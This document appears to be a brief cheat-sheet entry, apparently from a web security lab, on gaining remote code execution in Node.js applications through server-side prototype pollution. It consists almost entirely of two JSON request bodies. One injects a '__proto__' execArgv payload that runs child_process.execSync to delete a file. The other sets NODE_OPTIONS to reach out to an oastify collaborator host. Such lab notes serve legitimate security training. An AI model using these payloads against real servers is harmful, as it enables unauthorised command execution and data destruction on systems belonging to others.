Remote code execution

Via server-side prototype pollution

POST /my-account/change-address HTTP/2
...

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"iYgjk4UcwvHc8rVNgEvIN0kh1fEtuWiA",
    "__proto__": {
        "execArgv":[
            "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"
        ]
    }
}

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"iYgjk4UcwvHc8rVNgEvIN0kh1fEtuWiA",
    "__proto__": {
        "shell":"node",
        "NODE_OPTIONS":"--inspect=YOUR-COLLABORATOR-ID.oastify.com\"\".oastify\"\".com"
    }
}

Last updated 1 year ago